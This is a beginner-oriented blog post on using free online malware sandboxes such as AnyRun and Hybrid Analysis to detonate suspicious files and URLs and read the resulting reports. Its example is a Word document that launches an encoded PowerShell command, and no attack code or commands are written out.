Authors: Anaïs Sidhu and Samuel Cameron
In this article we will discuss what an OSINT Sandbox is, how it is used practically, and how it can help to accelerate your learning and fill the gaps in your security expertise.
*The authors do not encourage the download of malware on any devices that hold any valuable data assets.
*The views and opinions of this blog are the authors’ alone*
Background
We recently surveyed our network on LinkedIn to determine what they thought to be the most valuable skill when working in a Secure Operations Center (SOC). Provided the options of Malware Analysis Experience, Threat Intelligence Experience, Scripting Experience, and Red Team Experience, 45 percent of respondents felt that Threat Intelligence Experience is most valuable. Malware Analysis followed with 32 percent respondent favorability, while scripting Experience and Red Team Experience received 13 percent and 11 percent of the poll votes, respectively. With responses being dispersed across the four options, there is not any one option that stands out significantly. So, where should someone aspiring to work in cybersecurity start?
With all of the things that modern day security analysts and researchers are supposed to know, it can be quite confusing and a bit overwhelming when it comes time to determine what to really dig into. Here are just a few things you should know when doing security work: Indicators of Compromise (IOC), Indicators of Attack (IOA), net.exe, Sysinternals suite of tools, event log analysis, encoding schemes employed by malware, and anti-sandboxing mechanisms. Needless to say, that list could extend over several more pages. A lack of knowledge in any of these areas can be seen as a ‘barrier to entry’ and can really stop people from being confident in their abilities and from applying to security jobs.
What if we could integrate years of security research and expertise at the click of a button? What if we didn't have to know the ins and outs of the above topics to be effective and efficient in the realm of security operations? What if we had tools which given a sample to study could apply the aforementioned skills, and all we had to focus on was interpreting the outputted results?
It turns out that there is a mechanism to help us achieve just that. A sandbox, as it relates to cybersecurity, is a safe environment where files and URLs (referred to henceforward as ‘samples’) are detonated/executed in order to see what they do. It’s like playing with a live sample of the malware or malicious file, poking it, and seeing everything that it would try to do on a real system. A crucial aspect of this would be that you are able to detonate the malicious thing, without risking it affecting other systems.
Now that you have an idea of the benefits and fun possible within the scope of a sandbox, where do you get one? The good news is they are not expensive. You can get some pretty decent sandbox software, such as Cukoo, which is free to download and use. If you have a dedicated system and a lot of free time, this is a pretty good option. However, setting up a lab can not only be tedious but also downright difficult, especially if you are just starting out and trying to break into industry.
Fortunately, Open-Source Intelligence (OSINT) Sandboxes provide a solution. OSINT is being used very loosely here to refer to the practical use of Open-Source Intelligence into automated malware analysis using sandboxes. These sandboxes have both free and premium paid features. Let’s discuss some free version options.
There are more than a few publicly available sandboxes that security analysts can leverage free of charge, of note: AnyRun and Hybrid Analysis. Honorable mentions go to JoeSandbox and Malwr. A large portion of what remains of this blog will focus on AnyRun with a little bit of Hybrid Analysis for contrast.
Warning before we get started: The following tools are meant to detonate potentially unsafe files in a safe environment. Any file or URL that you upload to this site should be treated as if you are making the detonation report publicly available for all to see (the entire world). With that in mind, it is strongly encouraged that whatever file or URL you intend to upload does NOT contain sensitive, personal, company-affiliated, or in any way proprietary information which would be considered a breach of data if leaked on the internet.
One more thing: There are ways to actually download samples from these sites. You would have to intentionally and purposefully click the ‘Download’ or ‘Get Sample’ button in the tools in order to do so. BE CAREFUL as this is actual malware and will infect your system should you choose to download the sample and run it. Simply viewing the reports and such will NOT download the malware in any way.
If you want to follow along with the same sample that we used, please visit this link:
Detonating Files
Now we get into the fun stuff. Pretend you have a piece of malware, or at the very least, a piece of software that you would like to test. Perhaps that is a suspicious file that you received from a random email address with a subject field Invoice #00456. Alternatively, you can submit a URL if you so choose as opposed to a file, for example: hxxp://www.helloworld[.]com/en_us/portal/12345. Either way, you want to play around with the file or URL safely to ensure it doesn’t do anything fishy, pun intended.
At this point, you might be thinking, I’m a newbie, I don’t even know half of what to look for to call a file suspicious. Or, maybe you’re thinking “well I do have years of experience in security as an auditor, but I don’t have any malware analysis experience and little threat intelligence experience.” Still others may think “I am the furthest thing from a scripter or developer as one can be – I wouldn’t even know what a malicious piece of code looks like!” To those of you thinking along those lines - don’t panic. These tools DO THAT WORK FOR YOU. The only ask of you, as an opportunity to grow, is that you learn how to READ and INTERPRET sandbox findings. Sounds like a daunting task, but really, it’s not bad. So, let’s dive in.
Submitting your sample
Start with your piece of software or URL and visit the sandbox of your choosing. For this example, we’ll pick AnyRun. When you visit app.anyrun.com, you’re brought to the following screen:
Figure 1: AnyRun Upload Page
Figure 2: Hybrid Analysis Upload Page for Contrast
Clicking around the different buttons will give you a feel for the varying functionalities. There are far too many options and features to discuss in complete detail here, so we’ll cover the most important ones. Outlined above in red [Figure 1], you should see a button for ‘New Task’, this is the button we’ll use to submit our sample. We will not cover ‘Public Submissions’ in this blog but stay tuned as this topic may be in a future blog. In short, Public Submissions are where you can find old detonations that anyone on AnyRun has submitted up to ‘X’ number of days ago.
Next, you’ll click on ‘New Task’ and get ready to upload your file or submit your URL.
Note: If you are not already logged into your free account then you will be prompted to do so when you press ‘New Task’. Otherwise, you will see the following screen:
Figure 3: AnyRun Submit Sample Page
The options may seem a little overwhelming, so let’s break it down:
When using a free account, you will only be able to select the Windows 7, 32 bit operating system. Since this is sufficient for most malware, we will proceed with this setting. You will not be able to edit anything in the top half of the submit sample window. Options in the bottom right quadrant are also largely unchangeable when using a free account, however these will almost always be left alone when submitting a sample. That being said, if you’d like to explore more options for a more advanced analysis, you can do so by upgrading to the premium version.
Click on ‘Choose a File’ – [see red box in Figure 3]. A box will appear, allowing you to select the file you’d like to upload. It’s really that simple. Optionally, if you look at the green outlined box in Figure 3, you can see it gives you the option to select which directory to execute the file from. This is useful when some malware checks itself to see what directory it runs from – this is mostly an anti-sandbox technique. This option can be useful in some more advanced use cases, but for the most part you are good to leave it in the default ‘Temp directory’. (As said before, feel free to modify and click the buttons to really get to know the platform). When you have your settings ready, go ahead and click the ‘Run’ button to the bottom right.
When submitting a URL, simply paste the fully qualified URL into the ‘Type URL to File’ field. Make sure that you have either HTTP:// or HTTPS:// included as it will not run without those prepended to the URL. If the link leads to a file, you can click the button that says ‘Download with User Agent’ and if not, you can click the button that says ‘Open in Browser’. Selecting the ‘Open in Browser’ option is useful as it allows you to see the website, but either options will work to inspect the URL.
Congratulations! Your sample is running in a sandbox! Now, before you go adding ‘Threat Hunter’ to your resume, let’s ensure that you can talk on the output of the sandbox detonation a bit. Besides, the most important piece of the sandbox detonation is yet to be seen.
While the malware is running
Now that your malware is running, let’s highlight some of the most useful features. The length of time that your detonation runs can affect what your malware does. Some malware will execute a {mostly} sandbox evasion technique by waiting for ‘X’ number of minutes before performing any harmful action on the system. This technique hopes that whatever sandbox is running or analyst that is running it gets overly anxious and cuts off the sandbox after a minute of inactivity. When really the bad stuff was just waiting a couple of minutes before executing some malicious code. The default run time on AnyRun is one minute; however, it can be extended up to four times, one minute each using the following button outlined in Green (See Figure 4 below). The usefulness of this button may likely cause it to become your favorite button once you get into sandboxing a bit more.
It is also worth noting that you can actually interact with the sample in the window where you see your file open up. You can interact with it the same way that you would do things on your computer at home. For instance, we may respond ‘Yes’ to the popup shown in Figure 4 below.
Figure 4: AnyRun Running the Sample
All in all, sandboxes like the one shown here are mostly dynamic, meaning that the majority of the analysis is automated and tracked by the actual sandbox software itself. As the sample runs, AnyRun is monitoring for any unusual or suspicious behavior and will outline those things in the report. For instance, if you look below the detonation window, you will see a section titled ‘HTTP Requests’. Any HTTP activity conducted after the file was detonated will show up here. Moreover, indicators like the flame icon under the ‘Rep’ column indicate that AnyRun has identified that URL or domain as malicious. This already allows us to reap the benefits of using OSINT sandboxes as we have automated malware analysis AND threat intelligence right in front of our eyes, while all we did was submit the sample.
Feel free to click around in the detonation window while your sample is running. AnyRun is logging all processes created and will show those in the pane to the right. These will become very interesting to you as you progress through your malware analysis abilities. You’ll soon be able to pick out processes and commands that appear suspicious or malicious without AnyRun giving you the hints (Look in Figure 4, to the right pane. You see where Powershell.exe is executing a command? That box is filled in with Orange to the left border, this means that AnyRun thinks that process or command is suspicious. The suspicion makes sense as Microsoft Word calling an encoded Powershell command causing HTTP activity outbound isn’t typical.)
After the Detonation / Reviewing the Report
The after-detonation report is perhaps the most important piece of all. After all, if the report is not detailed and not easy to read, then we would all have to be experts in malware analysis, scripting, and threat intelligence in order to read the raw event data. Lucky for us, this is not the case in our sandbox technologies.
After your submission, you should see something similar to the report shown below:
Figure 5: AnyRun Detonation Report
Figure 6: Hybrid Analysis Detonation Report for Contrast
There are 3 very important panes that we will discuss here. (All shown in Figure 5)
The bottom pane right under the detonation window: This is where we see network activity that happened during the detonation of the sample. If you detonated a URL, by default, you should see that URL in the ‘HTTP Requests’ tab of this pane. If you detonated a file, you should see any network connections that were made as a result of that file being detonated (worth noting that if you went into the sandbox and performed any HTTP requests via the web browser, those will also show up here). Also, like any good sandbox engine, alongside the URL/IP, it gives you a column for “Rep”. This is where it will tell you if it considers that artifact to be benign, unknown, or malicious. You can also download the packet capture from this pane should you choose to do a deeper analysis of the network connections. As pictured in Figure 5 using the red arrow, PowerShell was used to make an outbound request to a strange URL. This is rightfully flagged suspicious.
The top right pane: This pane gives you the name of the sample that you submitted, the hashes, and some metadata about the sample. In addition to that, tags are added by the sandbox technology if it finds an artifact or activity that matches the Tactics, Techniques, or Procedures (TTPs) or Indicators of Compromise (IOCs) from known malware samples, like Emotet. Immediately, in the above example, we see tags that indicate that this Word document runs macros and that some activity in this detonation is indicative of Emotet malware. If you would like to see a quick breakout of the different IOCs, simply click the ‘IOC’ button in this pane to the right of ‘Get Sample’.
The bottom right pane: This is likely going to be the most unfamiliar/foreign/worrisome one to beginners. That’s OK – looking at processes and services isn’t fun or exciting for anyone. The good news is, AnyRun is able to classify what is sees here as “Suspicious”, “Malicious”, or “No verdict” so you don’t have to be an expert programmer to have a sense of what is happening with each process or command line seen. For example, in the above screenshot, we can see that Winword.exe was executed (a quick Google search of that shows that is the benign executable for Microsoft Word.) We would expect to see that because our sample was a Microsoft Word document. After that, PowerShell was launched to run an encoded command (I know it is encoded based on the -e in the PowerShell command line). AnyRun outlines this process as ‘Suspicious’ by giving it a left Orange border. Any process or command line it sees as ‘Suspicious’ will have that border.
What can we deduce from this report?
When the Word document was opened it did a few things:
Launched an encoded PowerShell command
Made 3 outbound HTTP requests to strange websites, 2 of which are classified as malicious.
Built in threat intelligence tells us that this sample is similar to activity used by the malware Emotet. All in all, we can conclude this is not something we would want on our computer.
Conclusion
There seems to be many different ‘barriers to entry’ when it comes to security operations or researching malware. There are so many things that you are expected to know with no clear indication of which may be the most critical to focus your time on. Features found in OSINT sandboxes can really be leveraged to fill those gaps for you.
Not a good scripter? AnyRun will let you know if it thinks the command line is Suspicious or Malicious. Not a good curator or sorter of Threat Intelligence? Hybrid Analysis will let you know if a contacted domain is known to be malicious or not. Do you lack practical experience with malware analysis? Let online sandboxing software take control of the analysis while you work on reading and interpreting the findings from the sandbox, into actionable deliverables for yourself and the business you support.
Bonus: You can actually use the detonation reports from these tools to GUIDE your learning! If you see a process running and don’t know why it is considered suspicious look it up, let it drive your research. If you see a domain classified as malicious – checking other OSINT sources (like talosintelligence.com or virustotal.com) can provide further information. Let the reports show you what you are unfamiliar with, and then research those things to fill your gaps. Accelerate your security skills using OSINT sandboxes.
About the authors:
Anaïs Sidhu is a part of Cisco System’s Internet of Things Strategy & Planning team, supporting IoT products including cybersecurity solution, Cisco Cyber Vision.
Samuel Cameron is the Team Lead for Cisco System’s Managed Security Service - Active Threat Analytics (ATA) in Raleigh, North Carolina.